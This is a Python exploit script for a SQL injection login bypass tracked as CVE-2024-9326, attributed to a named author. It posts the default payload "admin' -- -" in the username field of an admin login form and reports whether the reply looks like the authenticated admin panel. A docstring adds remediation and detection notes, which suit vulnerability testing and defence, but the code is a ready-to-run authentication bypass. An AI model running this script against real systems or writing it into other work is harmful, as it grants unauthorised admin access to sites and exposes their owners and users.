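#!/usr/bin/env python3
#===========================================================
# SQL Injection Login Exploit Script (CVE-2024-9326)
#
#Written by: Arvin Rafael Legaspi
#Date: October 5, 2024
#===========================================================
"""Check an admin login form for the SQL injection tracked as CVE-2024-9326.

The script sends a single POST carrying the form fields ``username``,
``password`` and ``submit`` and reports whether the reply looks like an
authenticated admin page.  The default username value closes the quoted
string and comments out the remainder of the statement, so a positive result
indicates that the login handler concatenates the submitted field into its
SQL text instead of binding it as a parameter.

Defender notes:
    * Remediation: pass the credentials as bound parameters of a prepared
      statement and compare the password against a stored hash in
      application code; apply the vendor fix for the CVE where one exists.
    * Detection: with request-body logging or a WAF, look for POSTs to the
      admin login whose ``username`` field contains a quote followed by an
      SQL comment marker, especially when the same client then requests
      admin-only pages.
"""

import argparse
from urllib.parse import urlsplit, urlunsplit

import requests

# Seconds to wait for the server; without a timeout requests.post() can block
# forever on an unresponsive host.
_REQUEST_TIMEOUT = 10


# NOTE: this name shadows the builtin ascii(); it is kept so that anything
# importing the function by its original name keeps working.
def ascii():
    """Print the start-up banner."""
    # Line breaks and column spacing of the banner were restored by hand.
    print(r"""
   _____  ____  _        _____       _           _   _
  / ____|/ __ \| |      |_   _|     (_)         | | (_)
 | (___ | |  | | |        | |  _ __  _  ___  ___| |_ _  ___  _ __
  \___ \| |  | | |        | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
  ____) | |__| | |____   _| |_| | | | |  __/ (__| |_| | (_) | | | |
 |_____/ \___\_\______| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_|
                                   _/ |
                                  |__/
    """)


def _build_target_url(target, port):
    """Return *target* with *port* placed in the authority part of the URL.

    Port 80 is the "not specified" default and leaves *target* untouched, so
    an ``https://`` URL given without ``-P`` keeps its own default port.
    Appending ``:port`` to the end of the string, as the script used to do,
    puts the port after the path (``http://host/admin/index.php:8080``).
    """
    if port == 80:
        return target

    parts = urlsplit(target)
    if not parts.netloc:
        # No scheme/authority to edit: keep the historical concatenation and
        # let requests report the malformed URL.
        return f"{target}:{port}"

    userinfo, at_sign, hostport = parts.netloc.rpartition("@")
    if hostport.startswith("["):
        # Bracketed IPv6 literal: the host ends at the closing bracket.
        host = hostport[: hostport.find("]") + 1]
    else:
        # Drop a port already present in the URL; the explicit option wins.
        host = hostport.split(":", 1)[0]

    return urlunsplit(parts._replace(netloc=f"{userinfo}{at_sign}{host}:{port}"))


# Setting up command-line argument parsing
def main():
    """Parse the command line and run the login check once."""
    ascii()

    parser = argparse.ArgumentParser(description='SQL Injection login script for CVE-2024-9326.')

    # Set the target URL argument as required
    parser.add_argument('-t', '--target', required=True, help='Target URL of the vulnerable admin login page')
    parser.add_argument('-P', '--port', type=int, default=80, help='Port number of the target server (default: 80)')
    parser.add_argument('-u', '--username', type=str, default="admin' -- -", help='SQL injection payload for the username')
    parser.add_argument('-p', '--password', type=str, default="pass123", help='Password for the login (default: pass123)')

    # Parsing arguments
    args = parser.parse_args()

    # Formulate the target URL with the specified port
    target_url = _build_target_url(args.target, args.port)

    # Run the check with the provided arguments
    perform_sqli(target_url, args.username, args.password)


# Function to execute the SQL injection check
def perform_sqli(target_url, username_payload, password_payload):
    """POST the login form once and print whether the login was accepted.

    Args:
        target_url: URL of the login page the form is posted to.
        username_payload: Value sent in the ``username`` form field.
        password_payload: Value sent in the ``password`` form field.

    Request failures (connection errors, timeouts, malformed URLs) are caught
    and printed; nothing is returned.
    """
    # Form fields as submitted by the login page
    post_data = {
        'username': username_payload,
        'password': password_payload,
        'submit': 'Login'
    }

    try:
        # requests follows redirects by default, so the text inspected below
        # is that of the final page, not of the login handler's own reply.
        response = requests.post(target_url, data=post_data, timeout=_REQUEST_TIMEOUT)

        # Output the response from the server
        print("Response:\n")
        print("=====================================================================")
        # The header above used to be followed by no response data at all.
        print(f"HTTP {response.status_code} from {response.url}")

        # Heuristic only: 'change-password.php' is presumably linked from the
        # authenticated admin pages. If the login page itself contains that
        # string the check reports a false positive -- confirm manually.
        if 'change-password.php' in response.text:
            print("\nLogin successful! You may have access to the admin panel.")
        else:
            print("\nLogin failed.")

        print("\n=====================================================================")

    except requests.exceptions.RequestException as e:
        # Print any error if it occurs during the request
        print(f"Error: {e}")


if __name__ == "__main__":
    main()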